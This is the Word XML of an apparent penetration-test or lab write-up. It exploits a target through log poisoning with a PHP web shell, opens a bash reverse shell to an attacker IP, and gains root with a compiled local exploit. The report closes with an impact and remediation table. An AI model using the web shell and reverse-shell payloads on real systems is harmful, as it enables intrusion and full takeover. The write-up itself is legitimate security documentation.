          <w:p w14:paraId="1088253E" w14:textId="5C42546F" w:rsidR="00353E6A" w:rsidRDefault="00353E6A">
            <w:pPr>
              <w:rPr>
                <w:color w:val="EE0000"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00353E6A">
              <w:rPr>
                <w:color w:val="EE0000"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>&lt;?</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00353E6A">
              <w:rPr>
                <w:color w:val="EE0000"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>php</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00353E6A">
              <w:rPr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53E6A">
              <w:rPr>
                <w:color w:val="EE0000"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>passthru</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00353E6A">
              <w:rPr>
                <w:color w:val="EE0000"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>($_GET['</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00353E6A">
              <w:rPr>
                <w:color w:val="EE0000"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>cmd</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00353E6A">
              <w:rPr>
                <w:color w:val="EE0000"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>']);?</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00353E6A">
              <w:rPr>
                <w:color w:val="EE0000"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0BACD2BD" w14:textId="77777777" w:rsidR="00353E6A" w:rsidRDefault="00353E6A">
            <w:pPr>
              <w:rPr>
                <w:color w:val="EE0000"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="00D1724B" w14:textId="6AB86F71" w:rsidR="00353E6A" w:rsidRPr="00353E6A" w:rsidRDefault="00353E6A">
            <w:pPr>
              <w:rPr>
                <w:color w:val="EE0000"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00353E6A">
              <w:rPr>
                <w:color w:val="EE0000"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="40984241" wp14:editId="64CECC63">
                  <wp:extent cx="4591050" cy="1863725"/>
                  <wp:effectExtent l="0" t="0" r="0" b="3175"/>
                  <wp:docPr id="8256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647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51F83" w14:textId="77777777" w:rsidR="009F798C" w:rsidRDefault="009F798C">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="0C0407AB" w14:textId="4B6DF109" w:rsidR="00353E6A" w:rsidRDefault="00353E6A" w:rsidP="00353E6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access our parameters through the logs </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3E723F30" w14:textId="77777777" w:rsidR="00353E6A" w:rsidRDefault="00353E6A" w:rsidP="00353E6A">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="1B67F957" w14:textId="40F8AC7C" w:rsidR="00353E6A" w:rsidRDefault="00353E6A" w:rsidP="00353E6A">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00353E6A">
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1EFDEB7D" wp14:editId="78C4816B">
                  <wp:extent cx="4591050" cy="3190240"/>
                  <wp:effectExtent l="0" t="0" r="0" b="0"/>
                  <wp:docPr id="199968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6854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EE6D2" w14:textId="77777777" w:rsidR="00353E6A" w:rsidRDefault="00353E6A" w:rsidP="00353E6A">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="6766911A" w14:textId="0F606A7B" w:rsidR="00750F3E" w:rsidRDefault="00750F3E" w:rsidP="00750F3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can verify using ping command also and look for the ICMP packet on our attacker machine </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6C691ECC" w14:textId="77777777" w:rsidR="00750F3E" w:rsidRDefault="00750F3E" w:rsidP="00750F3E">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="4F4E7A73" w14:textId="6C0101EC" w:rsidR="00750F3E" w:rsidRDefault="00750F3E" w:rsidP="00750F3E">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00750F3E">
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7DB3BB9C" wp14:editId="3DD08B6C">
                  <wp:extent cx="4578350" cy="1958340"/>
                  <wp:effectExtent l="0" t="0" r="0" b="3810"/>
                  <wp:docPr id="262310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108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DFC3" w14:textId="77777777" w:rsidR="00750F3E" w:rsidRDefault="00750F3E" w:rsidP="00750F3E">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="30647625" w14:textId="25587B4A" w:rsidR="00750F3E" w:rsidRPr="00750F3E" w:rsidRDefault="00750F3E" w:rsidP="00750F3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received ICMP packets on our attacker machine so we can say we have valid RCE on target System </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="069181DF" w14:textId="77777777" w:rsidR="00750F3E" w:rsidRPr="00353E6A" w:rsidRDefault="00750F3E" w:rsidP="00353E6A">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="2CBAF9E1" w14:textId="2E9A3ECE" w:rsidR="009F798C" w:rsidRDefault="009F79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7 –</w:t>
            </w:r>
            <w:r w:rsidR="00750F3E">
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve"> Get Reverse bash shell on target Machine </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6FDDA529" w14:textId="77777777" w:rsidR="00750F3E" w:rsidRDefault="00750F3E">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="5863B0F8" w14:textId="1EF14045" w:rsidR="00750F3E" w:rsidRPr="00750F3E" w:rsidRDefault="00750F3E" w:rsidP="00750F3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Payload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750F3E">
              <w:rPr>
                <w:color w:val="EE0000"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>bash -c 'bash -</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00750F3E">
              <w:rPr>
                <w:color w:val="EE0000"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>i</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00750F3E">
              <w:rPr>
                <w:color w:val="EE0000"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve"> &gt;&amp; /dev/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00750F3E">
              <w:rPr>
                <w:color w:val="EE0000"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>tcp</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00750F3E">
              <w:rPr>
                <w:color w:val="EE0000"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>/10.50.41.101/1234 0&gt;&amp;1'</w:t>
            </w:r>
            <w:r w:rsidRPr="00750F3E">
              <w:rPr>
                <w:color w:val="EE0000"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="55B17B70" w14:textId="3D456AB5" w:rsidR="00750F3E" w:rsidRDefault="00750F3E" w:rsidP="00750F3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Payload Should be URL Encoded while passing </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="556D49E7" w14:textId="72748E3B" w:rsidR="00750F3E" w:rsidRDefault="00750F3E" w:rsidP="00750F3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Start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on attacker machine on 1234</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0869C53B" w14:textId="77777777" w:rsidR="00750F3E" w:rsidRDefault="00750F3E" w:rsidP="00750F3E">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="5199E1AD" w14:textId="1F581007" w:rsidR="00750F3E" w:rsidRPr="00750F3E" w:rsidRDefault="00750F3E" w:rsidP="00750F3E">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00750F3E">
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="106B9C03" wp14:editId="17ECCE4A">
                  <wp:extent cx="4578350" cy="1942465"/>
                  <wp:effectExtent l="0" t="0" r="0" b="635"/>
                  <wp:docPr id="11668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1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94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77A2" w14:textId="77777777" w:rsidR="00750F3E" w:rsidRDefault="00750F3E">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="084BF7CA" w14:textId="3A67780A" w:rsidR="00750F3E" w:rsidRDefault="00750F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8 – Privilege Escalation on target </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="14B4A6A2" w14:textId="77777777" w:rsidR="002E22FB" w:rsidRDefault="002E22FB">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="7307E225" w14:textId="01941955" w:rsidR="002E22FB" w:rsidRDefault="002E22FB" w:rsidP="002E22F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files with weak permissions </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="749DC6C3" w14:textId="77777777" w:rsidR="002E22FB" w:rsidRDefault="002E22FB" w:rsidP="002E22FB">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="39A2AA53" w14:textId="512C3398" w:rsidR="002E22FB" w:rsidRPr="002E22FB" w:rsidRDefault="002E22FB" w:rsidP="002E22FB">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="002E22FB">
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="27C42A4F" wp14:editId="1BDC8AD0">
                  <wp:extent cx="4565650" cy="3098165"/>
                  <wp:effectExtent l="0" t="0" r="6350" b="6985"/>
                  <wp:docPr id="65098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840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09148" w14:textId="77777777" w:rsidR="002E22FB" w:rsidRDefault="002E22FB">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="48FEF048" w14:textId="77777777" w:rsidR="002E22FB" w:rsidRDefault="002E22FB" w:rsidP="002E22F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one lets find local exploit relevant to it </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7CB6DDCD" w14:textId="77777777" w:rsidR="002E22FB" w:rsidRDefault="002E22FB" w:rsidP="002E22FB">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="62EB728D" w14:textId="77777777" w:rsidR="002E22FB" w:rsidRDefault="002E22FB" w:rsidP="002E22FB">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="002E22FB">
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="17FAC5AB" wp14:editId="18BAB9A8">
                  <wp:extent cx="4565650" cy="1627505"/>
                  <wp:effectExtent l="0" t="0" r="6350" b="0"/>
                  <wp:docPr id="1160564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49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AEFD8" w14:textId="77777777" w:rsidR="002E22FB" w:rsidRDefault="002E22FB" w:rsidP="002E22FB">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="2BAF9FB1" w14:textId="77777777" w:rsidR="00AE7808" w:rsidRDefault="002E22FB" w:rsidP="002E22F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Configure Expl</w:t>
            </w:r>
            <w:r w:rsidR="00AE7808">
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve">oits and send to target over python server </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="23A9F331" w14:textId="77777777" w:rsidR="00AE7808" w:rsidRDefault="00AE7808" w:rsidP="00AE7808">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="4D048646" w14:textId="77777777" w:rsidR="00AE7808" w:rsidRDefault="00AE7808" w:rsidP="00AE7808">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00AE7808">
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6887F4CD" wp14:editId="4DB4CED9">
                  <wp:extent cx="4565650" cy="2770505"/>
                  <wp:effectExtent l="0" t="0" r="6350" b="0"/>
                  <wp:docPr id="70704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0495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277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D826B" w14:textId="77777777" w:rsidR="00AE7808" w:rsidRDefault="00AE7808" w:rsidP="00AE7808">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="17FC1444" w14:textId="77777777" w:rsidR="00AE7808" w:rsidRDefault="00AE7808" w:rsidP="00AE780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Download files locally using </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>wget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AD92C04" w14:textId="77777777" w:rsidR="00472AEC" w:rsidRDefault="00472AEC" w:rsidP="00472AEC">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="13EA8AA2" w14:textId="041251A4" w:rsidR="00472AEC" w:rsidRPr="00472AEC" w:rsidRDefault="00472AEC" w:rsidP="00472AEC">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00472AEC">
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4DD2A7EA" wp14:editId="5E74600F">
                  <wp:extent cx="4641850" cy="1484630"/>
                  <wp:effectExtent l="0" t="0" r="6350" b="1270"/>
                  <wp:docPr id="1450384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3840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FD54D" w14:textId="77777777" w:rsidR="00AE7808" w:rsidRDefault="00AE7808" w:rsidP="00AE7808">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="7C74B6CB" w14:textId="77777777" w:rsidR="009F798C" w:rsidRDefault="00AE7808" w:rsidP="00AE7808">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00AE7808">
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1106FF49" wp14:editId="0A4910BC">
                  <wp:extent cx="4641850" cy="4074795"/>
                  <wp:effectExtent l="0" t="0" r="6350" b="1905"/>
                  <wp:docPr id="203965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6597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798C" w:rsidRPr="00AE7808">
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:br/>
            </w:r>
          </w:p>
          <w:p w14:paraId="15226053" w14:textId="52074714" w:rsidR="00AE7808" w:rsidRDefault="00AE7808" w:rsidP="00AE780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Compile </w:t>
            </w:r>
            <w:r w:rsidR="00472AEC">
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve">the files </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="30947FD6" w14:textId="77777777" w:rsidR="00AE7808" w:rsidRDefault="00AE7808" w:rsidP="00AE7808">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="62F94D00" w14:textId="06E8774D" w:rsidR="00472AEC" w:rsidRDefault="00472AEC" w:rsidP="00AE7808">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00472AEC">
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1F3587D0" wp14:editId="60B4A172">
                  <wp:extent cx="4603750" cy="1404620"/>
                  <wp:effectExtent l="0" t="0" r="6350" b="5080"/>
                  <wp:docPr id="963175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758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54197" w14:textId="77777777" w:rsidR="00AE7808" w:rsidRDefault="00AE7808" w:rsidP="00AE7808">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="506D10C6" w14:textId="61ECA23A" w:rsidR="00472AEC" w:rsidRDefault="00472AEC" w:rsidP="00472AE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the Exploit by giving permissions </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1E1134B3" w14:textId="77777777" w:rsidR="00472AEC" w:rsidRDefault="00472AEC" w:rsidP="00472AEC">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="65268536" w14:textId="5F7CA356" w:rsidR="00472AEC" w:rsidRPr="00472AEC" w:rsidRDefault="00472AEC" w:rsidP="00472AEC">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00472AEC">
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4B930025" wp14:editId="5159104F">
                  <wp:extent cx="4603750" cy="1749425"/>
                  <wp:effectExtent l="0" t="0" r="6350" b="3175"/>
                  <wp:docPr id="290251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517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4EFD1" w14:textId="77777777" w:rsidR="00472AEC" w:rsidRDefault="00472AEC" w:rsidP="00472AEC">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="5B09D8A8" w14:textId="4D733AC2" w:rsidR="00472AEC" w:rsidRDefault="00472AEC" w:rsidP="00472A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the root Access to the target </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4A1A1ADD" w14:textId="77777777" w:rsidR="00472AEC" w:rsidRDefault="00472AEC" w:rsidP="00472AEC">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="26312BB7" w14:textId="49B20779" w:rsidR="00472AEC" w:rsidRDefault="00472AEC" w:rsidP="00472AEC">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00472AEC">
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4DD58DFD" wp14:editId="62DD295B">
                  <wp:extent cx="4572000" cy="3629660"/>
                  <wp:effectExtent l="0" t="0" r="0" b="8890"/>
                  <wp:docPr id="1590796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9622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2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6113B" w14:textId="0BD1F740" w:rsidR="00AE7808" w:rsidRPr="00AE7808" w:rsidRDefault="00AE7808" w:rsidP="00AE7808">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00AE7808" w14:paraId="1D6202CA" w14:textId="77777777" w:rsidTr="009F798C">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4508" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4B1B8E86" w14:textId="6AFD3B6D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4508" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="404394FA" w14:textId="6CEF7EE4" w:rsidR="00D34036" w:rsidRPr="00D34036" w:rsidRDefault="00D34036" w:rsidP="00D3403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>attacker gains remote code execution on the host, enabling arbitrary commands and lateral action.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7BB71362" w14:textId="498DDDFA" w:rsidR="00D34036" w:rsidRPr="00D34036" w:rsidRDefault="00D34036" w:rsidP="00D3403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>attacker recovers valid user credentials, enabling direct authenticated access such as SSH.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="396F8B44" w14:textId="0A6F42C2" w:rsidR="00D34036" w:rsidRPr="00D34036" w:rsidRDefault="00D34036" w:rsidP="00D3403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 xml:space="preserve">attacker abuses local privilege weaknesses to obtain root, </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00D34036">
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>breaking</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00D34036">
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve"> system integrity.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="073E8281" w14:textId="195C8E43" w:rsidR="00D34036" w:rsidRPr="00D34036" w:rsidRDefault="00D34036" w:rsidP="00D3403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>full system compromise and persistent backdoor or account for long term access.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7B378E7B" w14:textId="77777777" w:rsidR="009F798C" w:rsidRPr="009F798C" w:rsidRDefault="009F798C">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00AE7808" w14:paraId="35464F1B" w14:textId="77777777" w:rsidTr="009F798C">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4508" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4AFB5F18" w14:textId="098BC376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42DF0693" w14:textId="419F152B" w:rsidR="00D34036" w:rsidRPr="00D34036" w:rsidRDefault="00D34036" w:rsidP="00D3403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 xml:space="preserve">validate and restrict all file uploads; whitelist allowed types and perform </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00D34036">
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>server side</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00D34036">
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve"> checks; store uploads outside </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00D34036">
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>webroot</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00D34036">
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve"> and run them with least privilege.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="010C1C6F" w14:textId="0435F876" w:rsidR="00D34036" w:rsidRPr="00D34036" w:rsidRDefault="00D34036" w:rsidP="00D3403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 xml:space="preserve">sanitize and validate user input everywhere; remove any </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00D34036">
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>server side</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00D34036">
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve"> shell eval or unsafe exec calls.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="48AB786F" w14:textId="61992E59" w:rsidR="00D34036" w:rsidRPr="00D34036" w:rsidRDefault="00D34036" w:rsidP="00D3403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lastRenderedPageBreak/>
              <w:t>remove plaintext credentials from the filesystem and secure configuration files; use vaults or encrypted secrets and rotate credentials if exposed.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7538174F" w14:textId="56F3D2CD" w:rsidR="00D34036" w:rsidRPr="00D34036" w:rsidRDefault="00D34036" w:rsidP="00D3403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34036">
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve">audit and remove unnecessary SUID binaries; fix </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00D34036">
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>sudoers</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00D34036">
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve"> to grant minimal privileges and deny editors or shell shells with elevated rights; implement regular privilege audits.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="287BED2B" w14:textId="77777777" w:rsidR="009F798C" w:rsidRPr="009F798C" w:rsidRDefault="009F798C">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00AE7808" w14:paraId="0102CECF" w14:textId="77777777" w:rsidTr="009F798C">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4508" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="02435201" w14:textId="376E445D" w:rsidR="009F798C" w:rsidRPr="009F798C" w:rsidRDefault="009F798C">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="009F798C">
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
